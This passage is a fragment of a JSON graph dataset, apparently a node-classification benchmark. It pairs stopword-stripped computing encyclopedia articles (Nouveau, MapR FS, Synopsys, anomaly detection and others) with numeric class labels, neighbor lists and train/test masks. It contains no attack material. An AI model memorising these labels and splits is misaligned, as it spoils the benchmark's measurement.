    "text": "Nouveau_(software):nouveau software nouveau free open-source graphics device driver nvidia video cards tegra family socs written independent software engineers minor help nvidia employees project goal create open source driver reverse engineering nvidia proprietary linux drivers managed x.org foundation hosted freedesktop.org distributed part mesa 3d project initially based 2d-only free open-source nv driver red hat developer matthew garrett others claim obfuscated nouveau licensed mit license name project comes french word nouveau meaning new suggested original author irc client french autoreplace feature suggested word nouveau typed nv nouveau gallium3d-style device driver works top direct rendering infrastructure dri composed two kernel-components drm kms driver user-space components libdrm mesa 3d nouveau intends support nvidia microarchitectures tesla fermi kepler maxwell version 1.0.13 support pascal version 1.0.15 support volta latest version 1.0.16 supports new turing technical reasons nvidia gpus boot low frequency called clock device driver set higher frequency booting due lack documentation gpu nouveau lacked capability beginning result was/is major loss performance proven benchmarks compared performance nvidia proprietary device driver nouveau june 2014 breakthrough finally achieved initial re-clocking support added nouveau version 1.0.14 pascal support level maxwell 2 version 1.0.15 patch gtx 970 4gb accelerations pascal maxwell 2 level unlike amd nvidia provides documentation gpus developers nouveau forced use clean-room reverse engineering obtain necessary data enable write nouveau project uses several custom-made programs reverse engineering mmiotrace memory mapped i/o trace renouveau valgrind mmt renouveau reverse engineering nouveau program licensed gnu gpl using sdl collects data nouveau reverse engineering work users proprietary nvidia drivers help development nouveau providing information hardware nvidia cards renouveau renouveau works copying current graphics card mmio register space drawing graphics taking another copy mmio outputting difference text file runs six dozen different tests user computer makes tar.bz2 archive submits e-mail automatically transferred project ftp servers developers analyze kernel direct access hardware includes graphics card end-user software accesses various interfaces specific task nouveau written gallium3d-type device driver means shares large amounts code gallium3d drivers shared core mainlined mesa 3d distributed various linux distributions mesa 3d drivers includes supports multiple rendering interfaces designed give user-space programs e.g video games cad software access correspondent sip blocks free open-source implementation direct3d version 9 mainlined mesa 3d used nouveau however since software using direct3d programmed windows software used together wine linux rendering interface opengl developed khronos group implementations api part nvidia amd proprietary catalyst another implementation written free software enthusiasts brian paul intel coordinated mesa 3d gallium3d-type driver nouveau needs minor adaptations work implementation mesa 3d supports multiple interfaces designed give user-space programs e.g gstreamer handbrake access correspondent sip blocks also possible use ic designed rendering calculations purpose though approach consumes much electrical power compared utilizing purevideo sip block nouveau supports purevideo provides access vdpau partly xvmc nouveau support nvidia nvenc mesa galliumcompute also main project nvidia amd part near beta opencl 1.0 1.1 1.2 nouveau support cuda project coriander conversion cuda code opencl 1.2 possible cuda support therefore possible full opencl 1.2 support galliumcompute around year 2006 nvidia introduced falcon fast logic controller gpus 4th risc-v workshop july 2016 nvidia employees introduced plans replace falcon new proprietary custom design based risc-v instruction set nouveau started 2005 stéphane marchesin series patches upon nv driver officially announced february 2006 fosdem event first live demo nouveau linux.conf.au 2007 2010 nouveau accepted 2.6.33 version linux kernel experimental driver 26 march 2012 nouveau driver marked stable promoted staging area linux 3.4 nouveau gained major internal architecture overhaul linux 3.7 nouveau originally used direct rendering infrastructure dri mesa 3d rendering 3d computer graphics allows accelerate 3d drawing using graphics processing unit gpu directly 3d application february 2008 work dri support ceased moved new gallium3d nvidia publicly announced would release documentation gpus intent address areas impact out-of-the-box usability nvidia gpus nouveau nvidia alexandre courbot committed extensive patch set add initial support gk20a tegra k1 nouveau red hat employee ben skeggs committed patch adds support pascal-based gp104 chip found geforce gtx 1070 geforce gtx 1080-branded graphics cards linux kernel status 2016 future work introduced xdc2016 status new efforts opencl shown fosdem nouveau driver 3d counterpart mesa used default open-source driver nvidia cards many linux distributions including fedora 11 opensuse 11.3 ubuntu 10.04 debian compiz recommends nouveau nvidia proprietary driver june 2014 codethink reported run wayland-based weston compositor linux kernel 3.15 making use egl 100 open-source graphics driver stack tegra k1 october 2016 netbsd added experimental nouveau support netbsd 7 comparison benchmarks nouveau generally provides inferior performance nvidia proprietary graphics device drivers systems one unable boot linux properly due certain bugs nouveau thus nouveau disabled specifying kernel option nomodeset prior booting often done pressing codice_1 grub menu appending codice_2 linux line made permanent adding similar option codice_3",
    "neighbors": [
      3203,
      9604,
      2955,
      7309,
      4367,
      9489,
      10658,
      4902,
      6694,
      8621,
      7086,
      815,
      2224,
      7983,
      1842,
      6069,
      823,
      10173,
      7111,
      2635,
      3033,
      10971,
      1632,
      2277,
      1644,
      237,
      5356,
      8685,
      9455,
      9964,
      10480,
      499,
      2804,
      5363,
      8438,
      11630,
      11634,
      2937,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11323,
    "label": 6,
    "text": "MapR_FS:mapr fs mapr file system mapr fs clustered file system supports large-scale high-performance uses mapr fs supports variety interfaces including conventional read/write file access via nfs fuse interface well via hdfs interface used many systems apache hadoop apache spark addition file-oriented access mapr fs supports access tables message streams using apache hbase apache kafka apis well via document database interface first released 2010 mapr fs typically described mapr converged data platform due addition tabular messaging interfaces core technology however used implement forms persistent data storage interfaces ultimately supported server processes distinguish different capabilities overall data platform term mapr fs used specifically refer file-oriented interfaces mapr db mapr json db used refer tabular interfaces mapr streams used describe message streaming capabilities mapr fs cluster filesystem provides uniform access from/to files objects tables using universal namespace accessible client system access control also provided files tables streams using access control expressions extension common limited access control list allow permissions composed lists allowed users groups instead allow boolean combinations user id groups mapr fs developed starting 2009 mapr technologies extend capabilities apache hadoop providing performant stable platform design mapr fs influenced various systems andrew file system afs concept volumes afs strong similarity point view users although implementation mapr fs completely different one major difference afs mapr fs latter uses strong consistency model afs provides weak consistency meet original goals supporting hadoop programs mapr fs supports hdfs api translating hdfs function calls internal api based custom remote procedure call rpc mechanism normal write-once model hdfs replaced mapr fs fully mutable file system even using hdfs api ability support file mutation allows implementation nfs server translates nfs operations internal mapr rpc calls similar mechanisms used allow filesystem userspace fuse interface approximate emulation apache hbase api files mapr fs internally implemented splitting file contents chunks typically 256 mb size although size specific file chunk written containers element replication cluster containers replicated replication done either linear fashion replica forwards write operations next replica line star fashion master replica forwards write operations replicas time writes acknowledged master replica writes replicas complete internally containers implement b-trees used multiple levels map file offset chunk within file map file offset correct 8kb block within chunk b-trees also used implement directories long hash file directory name directory used find child file directory table volume special data structure similar directory many ways except allows additional access control management operations notable capability volumes nodes volume may reside within cluster restricted control performance particularly heavily contended multi-tenant systems running wide variety workloads proprietary technology used mapr fs implement transactions containers achieve consistent crash recovery features filesystem include",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      8772,
      1109,
      4708,
      8810,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      8410,
      6365,
      9441,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      3931,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      5066,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 11324,
    "label": 1,
    "text": "Correlation_database:correlation database correlation database database management system dbms data-model-independent designed efficiently handle unplanned ad hoc queries analytical system environment unlike row-oriented relational database management systems use records-based storage approach column-oriented databases use column-based storage method correlation database uses value-based storage vbs architecture unique data value stored auto-generated indexing system maintains context values correlation dbms stores unique data value physical database size significantly smaller relational column-oriented databases without use data compression techniques approximately 30gb correlation dbms may become smaller raw data set vbs model used cdbms consists three primary physical sets objects stored managed vbs model unique value raw data stored therefore data always normalized level unique values eliminates need normalize data sets logical schema data values stored together ordered sets based data types integers one set characters another etc optimizes data handling processes access values addition typical data values data value store contains special type data storing relationships tables functions similarly foreign keys rdbms structures cdbms relationship known dictionary stored data value making navigation tables completely automatic data dictionary contains typical metadata plus additional statistical data tables columns occurrences values logical schema also maintains information relationships logical tables index linking storage includes data used locate contents record ordered values data store ram-based storage system cdbms designed use much ram operating system provide large databases additional ram improves performance generally 4gb ram provide optimized access times 100 million records 8gb ram adequate databases 10 times size incremental ram consumed decreases database grows 16gb ram generally support databases containing approximately 20 billion records sample records shown illustrate physical differences storage structures used relational column-oriented correlation databases record-based structure used rdbms stores elements row adjacent variations like clustered indexing may change sequence rows rows columns values stored table table might stored column-based structure elements column stored adjacent consecutive duplicates within single column may automatically removed compressed efficiently vbs structure used cdbms unique value stored given abstract numeric identifier regardless number occurrences locations original data set original dataset constructed referencing logical identifiers correlation index may resemble storage note value mn occurs multiple times data included amount repeat data grows benefit multiplies records example table expressed correlation process form database normalization one achieve benefits column-oriented storage within rdbms one achieve benefits correlation database database normalization however traditional rdbms normalization process requires work form table configuration stored procedures sql statements say database correlation database naturally expresses fully normalized schema without extra configuration result correlation database may focused optimizations fully normalized structure correlation process similar occurs text-search oriented inverted index analytical data warehouse applications cdbms several advantages alternative database structures first database engine indexes data auto-generates schema fly loading implemented quickly easy update need physical pre-design need ever restructure database second cdbms enables creation execution complex queries associative queries show everything related x difficult impossible model sql primary advantage cdbms optimized executing ad hoc queries queries anticipated data warehouse design phase cdbms two drawbacks comparison database alternatives unlike relational databases used wide variety applications correlation database designed specifically analytical applications provide transaction management features used transactional processing second indexes data load process physical load speed cdbms slower relational column-oriented structures however eliminates need logical physical pre-design overall time use cdbms generally similar somewhat faster alternative structures",
    "neighbors": [
      2688,
      5632,
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      2456,
      1049,
      5658,
      5403,
      9631,
      1697,
      9634,
      4263,
      2344,
      7080,
      10413,
      10286,
      7983,
      9397,
      4155,
      3004,
      7868,
      9147,
      10048,
      2369,
      5953,
      11457,
      6085,
      9286,
      2383,
      2512,
      2901,
      10326,
      7767,
      11098,
      987,
      2780,
      4065,
      7650,
      8291,
      9828,
      10471,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      4598,
      1146,
      6395,
      3196
    ],
    "mask": "None"
  },
  {
    "node_id": 11325,
    "label": 2,
    "text": "Oryx/Pecos:oryx/pecos oryx/pecos proprietary operating system developed scratch bell labs beginning 1978 express purpose running large-scale pbx switching equipment operating system first used flagship system 75 recently used variations including definity g3 generic 3 switches manufactured t/lucent technologies spinoff avaya last system based oryx/pecos avaya g3 csi running release 13.1 definity software formal end sale february 5 2007 although widely believed unix-like variant developed directly bell labs case based version unix oryx/pecos consists kernel oryx associated processes running top pecos system named pecos street bounds westminster co campus colorado bell labs location oryx last word alphabetically os office dictionary oryx purportedly origin unicorn myth system loosely based thoth developed university waterloo demos developed los alamos scientific labs features normally found commercial operating systems found oryx/pecos features include one historical link oryx/pecos unix authors article proposed future development implementation unix execution environment top oryx/pecos fact project undertaken denver however project never became official product lucent even though completed successfully introduced internally eli version oryx/pecos 5th release e release persons working large office environments using lucent technologies avaya-branded telephones likely using oxyx-pecos indirectly due narrow focus proprietary nature operating system remains obscure 2005 avaya discontinued use oryx/pecos operating system instead porting become application ran linux new incarnation known communication manager also early 2000s definity one later ip 600 s8100 earlier attempt phase away os definity one ran windows nt 4.0 linux emulator also emulated oryx/pecos system allegedly according administrators used specific system failure attempt windows run top oryx/pecos linux problem however due robust nature carrier-grade equipment widespread use t/lucent/avaya pbx systems oryx/pecos probably continue supported indefinitely",
    "neighbors": [
      7983,
      3250,
      5363,
      5397,
      9366,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 11326,
    "label": 9,
    "text": "Plua:plua plua port programming language lua 5.0.3 along small ide palm computing platform lua programming language designed tecgraf computer graphics technology group puc-rio brazil plua includes extensions lua better support palm platform development ceased plua latest stable version plua 2.0 downloaded discussion board prior version plua 1.1 port lua 4.0 extensions differ somewhat versions new version thus sometimes called plua 2 avoid confusion plua special functions extensions support palm platform including compiler interpreter approximately 150 kb compiled helloworldapp.prc shown approximately 2 kb classic hello world program old version written follows text saved normal memo palm executed tapping run button ide alternatively program compiled prc palm os program file executable palm platform provided runtime program present ide breakdown program equivalent program new extensions written follows breakdown program first line comment rest little different",
    "neighbors": [
      1952,
      10565,
      8262,
      8776,
      4777,
      9714
    ],
    "mask": "Train"
  },
  {
    "node_id": 11327,
    "label": 1,
    "text": "Object-relational_impedance_mismatch:object-relational impedance mismatch object-relational impedance mismatch set conceptual technical difficulties often encountered relational database management system rdbms served application program multiple application programs written object-oriented programming language style particularly objects class definitions must mapped database tables defined relational schema term object-relational impedance mismatch derived electrical engineering term impedance matching objects instances reference one another therefore form graph mathematical sense network including loops cycles relational schemas contrast tabular based relational algebra defines linked heterogeneous tuples groupings data fields row different types field object-oriented programs well designed techniques result encapsulated objects whose internal representation hidden object-oriented framework underlying properties given object expected exposed interface outside one implemented alongside object however object-relational mapping necessarily exposes underlying content object interact interface object implementation specify hence object-relational mapping violates encapsulation object since many object-relational mappers automatically generate public fields corresponding database columns relational thinking private versus public access relative need object-oriented oo model absolute characteristic data state relational oo models often conflicts relativity versus absolutism classifications characteristics object-oriented paradigm objects interfaces together provide access internals object relational model hand utilizes derived relation variables views provide varying perspectives constraints ensure integrity similarly essential oop concepts classes objects inheritance polymorphism supported relational database systems proper mapping relational concepts object-oriented concepts made relational database tables linked associations found object-oriented analysis major mismatch existing relational oo languages type system differences relational model strictly prohibits by-reference attributes pointers whereas oo languages embrace expect by-reference behavior scalar types operator semantics vastly different models causing problems mapping example sql systems support string types varying collations constrained maximum lengths open-ended text types tend hinder performance oo languages consider collation argument sort routines strings intrinsically sized available memory subtle related example sql systems often ignore trailing white space string purposes comparison whereas oo string libraries typically possible construct new data types matter constraining possible values primitive types oo language another mismatch differences structural integrity aspects contrasted models oo languages objects composed objects—often high degree—or specialize general definition may make mapping relational schemas less straightforward relational data tends represented named set global unnested relation variables relations sets tuples conforming header see tuple relational calculus ideal counterpart oo languages constraints oo languages generally declared manifested exception raising protection logic surrounding code operates encapsulated internal data relational model hand calls declarative constraints scalar types attributes relation variables database whole semantic differences especially apparent manipulative aspects contrasted models however relational model intrinsic relatively small well-defined set primitive operators usage query manipulation data whereas oo languages generally handle query manipulation custom-built lower-level case- physical-access-path-specific imperative operations oo languages support declarative query sublanguages oo languages typically deal lists perhaps hash tables manipulative primitives necessarily distinct set-based operations relational model concurrency transaction aspects significantly different also particular transactions smallest unit work performed databases much larger relational databases operations performed classes oo languages transactions relational databases dynamically bounded sets arbitrary data manipulations whereas granularity transactions oo language typically level individual assignments primitive-typed fields general oo languages analogue isolation durability atomicity consistency ensured writing fields primitive types working around impedance mismatch problem object-oriented programs starts recognition differences specific logic systems employed mismatch either minimized compensated object-relational impedance mismatch problem universal problem oo databases name suggests impedance problem occurs relational databases common solution problem use alternative database nosql xml database attempts building object-oriented database management systems oodbms would avoid impedance mismatch problem less successful practice relational databases however partly due limitations oo principles basis data model research performed extending database-like capabilities oo languages notions transactional memory one common solution impedance mismatch problem layer domain framework logic scheme oo language used model certain relational aspects runtime rather attempt static mapping frameworks employ method typically analogue tuple usually row dataset component generic entity instance class well analogue relation advantages approach may include disadvantages may include mixing levels discourse within oo application code presents problems common mechanisms used compensate biggest challenge provide framework support automation data manipulation presentation patterns within level discourse domain data modelled address reflection and/or code generation utilized reflection allows code classes addressed data thus provide automation transport presentation integrity etc data generation addresses problem addressing entity structures data inputs code generation tools meta-programming languages produce classes supporting infrastructure en masse schemes may still subject certain anomalies levels discourse merge instance generated entity classes typically properties map domain e. g. name address well properties provide state management framework infrastructure e. g. ismodified argued christopher j date others truly relational dbms would pose problem domains classes essentially one thing native mapping classes relational schemata fundamental design mistake individual tuples within database table relation ought viewed establishing relationships entities representations complex entities however view tends diminish influence role object-oriented programming using little field type management system impedance mismatch programming domain objects user interface sophisticated user interfaces allow operators managers non-programmers access manipulate records database often require intimate knowledge nature various database attributes beyond name type particular considered good practice end-user productivity point view design user interfaces ui prevents illegal transactions cause database constraint violated entered requires much logic present relational schemata duplicated code certain code-development frameworks leverage certain forms logic represented database schema referential integrity constraints issues handled generic standard fashion library routines rather ad hoc code written case-by-case basis argued sql due limited set domain types alleged flaws makes proper object domain-modelling difficult sql constitutes lossy inefficient interface dbms application program whether written object-oriented style however sql currently widely accepted common database language marketplace use vendor-specific query languages seen bad practice avoidable database languages business system 12 tutorial proposed none widely adopted dbms vendors current versions mainstream object-relational dbmss like oracle microsoft sql server point may non-issue engines functionality given database arbitrarily extended stored code functions procedures written modern oo language java oracle microsoft .net language sql server functions invoked in-turn sql statements transparent fashion user neither knows cares functions/procedures originally part database engine modern software-development paradigms fully supported thus one create set library routines re-used across multiple database schemas vendors decided support oo-language integration dbms back-end realized despite attempts iso sql-99 committee add procedural constructs sql sql never rich set libraries data structures today application programmers take granted reasonable leverage directly possible rather attempting extend core sql language consequently difference application programming database administration blurred robust implementation features constraints triggers may often require individual dual dba/oo-programming skills partnership individuals combine skills fact also bears division responsibility issue however would point contention moot due fact 1 rdbmses never intended facilitate object modelling 2 sql generally seen lossy inefficient interface language one trying achieve solution rdbmses designed sql efficient designed namely query sort filter store large sets data would additionally point inclusion oo language functionality back-end simply facilitates bad architectural practice admits high-level application logic data tier antithetical rdbms canonical copy state located database model generally assumes database management system authoritative repository state concerning enterprise copies state held application program — temporary copies may date underlying database record subsequently modified transaction many object-oriented programmers prefer view in-memory representations objects canonical data view database backing store persistence mechanism another point contention proper division responsibility application programmers database administrators dba often case needed changes application code order implement requested new feature functionality require corresponding changes database definition organizations database definition responsibility dba due need maintain production database system 24 hours day many dbas reluctant make changes database schemata deem gratuitous superfluous cases outright refuse use developmental databases apart production systems help somewhat newly developed application goes live dba need approve changes programmers view intransigence however dba frequently held responsible changes database definition cause loss service production system—as result many dbas prefer contain design changes application code design defects far less likely catastrophic consequences organizations non-dysfunctional relationship dbas developers though issue present decision change database schema would driven business needs new requirement persist additional data performance boost critical application would trigger schema modification example key philosophical differences oo relational models summarized follows result object-relational impedance mismatch often argued partisans sides debate technology ought abandoned reduced scope database advocates view traditional procedural languages compatible rdbms many oo languages suggest less oo style ought used particular argued long-lived domain objects application code ought exist objects exist created query made disposed transaction task complete conversely oo advocates argue oo-friendly persistence mechanisms oodbms ought developed used relational technology ought phased many programmers dbas hold neither viewpoints view object-relational impedance mismatch mere fact life information technology deal also argued o/r mapping paying situations probably oversold advantages besides drawbacks skeptics point worth think carefully using add little value cases",
    "neighbors": [
      3712,
      261,
      8201,
      9112,
      6822,
      10413,
      11574,
      3004,
      8262,
      9286,
      6860,
      2901,
      6235,
      4065,
      4066,
      9828,
      1382,
      10471,
      1146,
      9467,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 11328,
    "label": 9,
    "text": "John_G._Kemeny:john g. kemeny john george kemeny born kemény jános györgy may 31 1926 – december 26 1992 hungarian-born american mathematician computer scientist educator best known co-developing basic programming language 1964 thomas e. kurtz kemeny served 13th president dartmouth college 1970 1981 pioneered use computers college education kemeny chaired presidential commission investigated three mile island accident 1979 according györgy marx one martians born budapest hungary jewish family kemeny attended rácz private primary school budapest classmate nandor balazs 1938 father left united states alone 1940 took whole kemeny family united states adoption second anti-jewish law hungary became imminent grandfather however refused leave perished holocaust along aunt uncle kemeny family settled new york city attended george washington high school graduated best results class three years later 1943 kemeny entered princeton university studied mathematics philosophy took year studies work manhattan project los alamos national laboratory boss richard feynman also worked john von neumann returning princeton kemeny graduated ba 1947 worked doctorate alonzo church also princeton worked albert einstein mathematical assistant graduate school 23 years old kemeny awarded doctorate 1949 dissertation entitled type-theory vs set-theory kemeny appointed dartmouth mathematics department full professor 1953 age 27 two years later became chairman department held post 1967 kemeny ventured curriculum development introduced finite mathematics courses teamed gerald l. thompson j. laurie snell write introduction finite mathematics 1957 students biology social sciences dartmouth mathematics department professors also wrote finite mathematical structures 1959 finite mathematics business applications 1962 colleges universities followed lead several textbooks finite mathematics composed elsewhere topic markov chains particularly popular kemeny teamed j. laurie snell publish finite markov chains 1960 provide introductory college textbook considering advances using potential theory obtained g. hunt wrote denumerable markov chains 1966 textbook suitable advanced seminars followed second edition 1976 additional chapter random fields david griffeath included kemeny kurtz pioneered use computers ordinary people early experiments lgp-30 invented basic programming language 1964 well one world first time-sharing systems dartmouth time-sharing system dtss 1974 american federation information processing societies gave award kemeny kurtz national computer conference work basic time-sharing kemeny president dartmouth 1970 1981 continued teach undergraduate courses research publish papers time president presided coeducation dartmouth 1972 also instituted dartmouth plan year-round operations thereby allowing students without buildings administration dartmouth became proactive recruiting retaining minority students revived founding commitment provide education american indians kemeny made dartmouth pioneer student use computers equating computer literacy reading literacy 1982 returned teaching full-time 1983 kemeny kurtz co-founded company called true basic inc. market true basic updated version language john kemeny died age 66 result heart failure lebanon new hampshire december 26 1992 lived etna near dartmouth campus",
    "neighbors": [
      11075,
      5317,
      9644,
      1783,
      8057,
      11229
    ],
    "mask": "None"
  },
  {
    "node_id": 11329,
    "label": 4,
    "text": "Extensible_Configuration_Checklist_Description_Format:extensible configuration checklist description format extensible configuration checklist description format xccdf xml format specifying security checklists benchmarks configuration documentation xccdf development pursued nist nsa mitre corporation us department homeland security xccdf intended serve replacement security hardening analysis documentation written prose xccdf used security content automation protocol",
    "neighbors": [
      635,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 11330,
    "label": 4,
    "text": "Anomaly_detection:anomaly detection data mining anomaly detection also outlier detection identification rare items events observations raise suspicions differing significantly majority data typically anomalous items translate kind problem bank fraud structural defect medical problems errors text anomalies also referred outliers novelties noise deviations exceptions particular context abuse network intrusion detection interesting objects often rare objects unexpected bursts activity pattern adhere common statistical definition outlier rare object many outlier detection methods particular unsupervised methods fail data unless aggregated appropriately instead cluster analysis algorithm may able detect micro clusters formed patterns three broad categories anomaly detection techniques exist unsupervised anomaly detection techniques detect anomalies unlabeled test data set assumption majority instances data set normal looking instances seem fit least remainder data set supervised anomaly detection techniques require data set labeled normal abnormal involves training classifier key difference many statistical classification problems inherent unbalanced nature outlier detection semi-supervised anomaly detection techniques construct model representing normal behavior given normal training data set test likelihood test instance generated learnt model anomaly detection applicable variety domains intrusion detection fraud detection fault detection system health monitoring event detection sensor networks detecting ecosystem disturbances often used preprocessing remove anomalous data dataset supervised learning removing anomalous data dataset often results statistically significant increase accuracy several anomaly detection techniques proposed literature popular techniques performance different methods depends lot data set parameters methods little systematic advantages another compared across many data sets parameters anomaly detection proposed intrusion detection systems ids dorothy denning 1986 anomaly detection ids normally accomplished thresholds statistics also done soft computing inductive learning types statistics proposed 1999 included profiles users workstations networks remote hosts groups users programs based frequencies means variances covariances standard deviations counterpart anomaly detection intrusion detection misuse detection",
    "neighbors": [
      6274,
      3555,
      9319,
      1640,
      8747,
      4468,
      7348,
      7577,
      7322,
      5245
    ],
    "mask": "None"
  },
  {
    "node_id": 11331,
    "label": 3,
    "text": "Socket_F:socket f socket f cpu socket designed amd opteron line cpus released august 15 2006 2010 socket f replaced socket c32 entry-level servers socket g34 high-end servers socket 1207 pins 1.1mm pitch employs land grid array contact mechanism socket f primarily use amd server line considered socket generation socket am2 used athlon 64 athlon 64 x2 well socket s1 used turion 64 turion 64 x2 microprocessors socket f base amd quad fx platform referred 4x4 quadfather prior release unveiled amd november 30 2006 modified version socket f named socket 1207 fx amd socket l1 nvidia allows dual-socket dual-core four effective cores eight effective cores future processors desktop pcs home enthusiasts revisions except socket fr3 require usage registered ddr2 sdram revisions except socket fr1 require dual-plane power-supply circuit cpu",
    "neighbors": [
      3586,
      8322,
      3588,
      8452,
      9475,
      3464,
      4872,
      7058,
      10260,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      4451,
      5859,
      1260,
      7788,
      7151,
      1776,
      1137,
      1651
    ],
    "mask": "None"
  },
  {
    "node_id": 11332,
    "label": 5,
    "text": "External_Data_Representation:external data representation external data representation xdr standard data serialization format uses computer network protocols allows data transferred different kinds computer systems converting local representation xdr called encoding converting xdr local representation called decoding xdr implemented software library functions portable different operating systems also independent transport layer xdr uses base unit 4 bytes serialized big-endian order smaller data types still occupy four bytes encoding variable-length types string opaque padded total divisible four bytes floating-point numbers represented ieee 754 format xdr developed mid 1980s sun microsystems first widely published 1987 xdr became ietf standard 1995 xdr data format use many systems including xdr standard exists three different versions following rfcs",
    "neighbors": [
      6403,
      9860,
      9987,
      1030,
      3847,
      9992,
      6544,
      1297,
      3218,
      8211,
      11413,
      5270,
      6681,
      5402,
      5531,
      6555,
      5021,
      3742,
      2206,
      5405,
      9343,
      10271,
      1955,
      10274,
      9381,
      10924,
      9389,
      7983,
      562,
      2995,
      1076,
      2996,
      7478,
      9909,
      7865,
      3133,
      3006,
      4543,
      4797,
      5437,
      5439,
      7360,
      6852,
      7364,
      9665,
      2887,
      8520,
      8265,
      10436,
      2509,
      4691,
      8916,
      11161,
      11355,
      5469,
      5470,
      479,
      5471,
      5472,
      9441,
      1893,
      10344,
      11112,
      9454,
      8432,
      5875,
      5118,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 11333,
    "label": 3,
    "text": "Synopsys:synopsys synopsys american eda company majority products include tools used design application-specific integrated circuit products include logic synthesis behavioral synthesis place route static timing analysis formal verification hardware description language systemc systemverilog/verilog vhdl simulators well transistor-level circuit simulation simulators include development debugging environments assist design logic chips computer systems recent years synopsys also expanded application security market founded 1986 aart j. de geus engineers general electric microelectronics center research triangle park north carolina synopsys first established optimal solutions charter develop market synthesis technology developed team general electric section lists various acquisitions synopsys made 1994-present synopsys three primary areas business including silicon design verification silicon intellectual property software integrity order preserve full history acquisitions included history across three business units coware part synopsys supplier platform-driven electronic system-level esl design software services coware headquartered san jose california offices around world major r offices belgium germany india coware development initiated interuniversity microelectronics centre imec belgium internal project 1992 1996 coware spun independent company coware one founding member systemc language 2005 coware acquired signal processing department cadence february 8 2010 synopsys announced acquisition coware products included platform architect model designer model library processor designer signal processing designer virtual platform designer novas software often referred novas company founded 1996 dr. paul huang address ongoing problem debugging chip designs novas purchased taiwan-based eda company springsoft may 2008 prior purchase novas partly owned springsoft developed underlying debug technology 2008 novas grew employ 50 people office locations across world headquartered san jose california springsoft novas acquired synopsys 2012 novas offered debugging visibility enhancement products cut verification time novas main product offerings included debussy debug system verdi automated debug system siloti family visibility enhancement products 2006 study found novas software sixth most-used eda vendor along novas software topped user satisfaction ratings 100 respondents europe 83 north america 69 asia saying either somewhat satisfied distinction also awarded novas software four years prior 2006 numerical technologies inc. san jose california united states based eda public nasdaq nmtc company company primarily known ip portfolio software tools services covering alternating phase shift mask alt-psm technology providing sub-wavelength design manufacturing solutions january 10 2000 numerical technologies acquired transcription enterprises inc. primarily known cats software mask data preparation october 27 2000 numerical technologies acquired cadabra design automation inc. cadabra provider automated ic layout cell creation technology used create building blocks standard cell semi-custom custom integrated circuits purchase price 99 million march 3 2003 acquired synopsys springsoft software company developed vlsi design debugging software company founded grant taiwanese national science council february 1996 1997 springsoft established novas software silicon valley market springsoft vlsi debugging software springsoft created custom layout tool called laker us-based company called silicon canvas may 2008 springsoft purchased novas software silicon canvas combined form wholly owned subsidiary springsoft usa springsoft employed 400 people office locations across world synopsys announced acquisition springsoft 2012 synplicity inc. supplier software solutions design programmable logic devices fpgas plds cplds used communications military/aerospace consumer semiconductor computer electronic systems synplicity tools provided logic synthesis physical synthesis verification functions fpga fpga-based asic prototyping dsp designers synplicity listed nasdaq acquired synopsys 227 million transaction finalized may 15 2008 synplicity founded ken mcelvain chief technical officer alisa yaffa former ceo arc international plc designer arc argonaut risc core embedded processors widely used soc devices iot storage digital home mobile automotive applications arc processors licensed 200 companies shipped 1.5 billion products per year arc international acquired synopsys 2010 roots arc international date back early 1990s company founded jez san build upon 3d accelerator technology previously developed super nintendo entertainment system division argonaut software forerunner arc originally called mario mathematical argonaut rotation i/o chip later dubbed super fx went sell millions time outselling arm risc core following success super fx designers split main company subsidiary called argonaut technology ltd atl design renamed arc marketed general-purpose configurable microprocessor later atl spun separate company arc international 1995 bob terwilliger took arc first ceo created company licensing strategy commercialized product including acquisition metaware vautomation precise software raised 50 million pre-ipo took company public september 2000 raising additional 250 million list notable events following synopsys announced acquisition virage logic june 10 2010 research development clarified networks tools began 2002 continued four years oulu university secure programming group ouspg clarified networks spun research group 2006 company entered venture cup competition year one finalists 2007 founders clarified networks also awarded vmware applicance called hownetworks 2011 company acquired codenomicon 2015 synopsys announced acquisition codenomicon coverity provider software development tools coverity tools operated via static dynamic software analysis capable finding defects related security stability testing february 2014 coverity announced agreement acquired synopsys 350 million net cash hand november 2016 synopsys acquired cigital software security firm specializes source-code static analysis penetration testing november 2017 synopsys acquired black duck software software firm based burlington focuses software composition analysis black duck hub solution scans source binary code open source libraries components providing visibility license security risks may impact organizations major way across three core business areas synopsys products services ranging silicon software coverity static application security testing sast finds fixes security quality issues code–fast black duck software composition analysis secures manages open source development deployment accurate automated security testing web applications defensics comprehensive versatile automated black box fuzzer enables organizations efficiently effectively discover remediate security weaknesses software reduce risk breach identifying exploiting business-critical vulnerabilities on-demand security testing expertise managed services include dynamic application security testing penetration testing static application security testing mobile application security testing managed network security testing accelerate application security program help experts professional services include strategy planning bsimm architecture design red teaming insider threat detection embedded software testing secure coding guidelines thick client testing application security testing services on-demand expertise help quickly identify open source legal security quality risks software audit services include open source audits application security audits code quality audits merger acquisition audits product formerly known black duck ondemand black duck audit services",
    "neighbors": [
      4742,
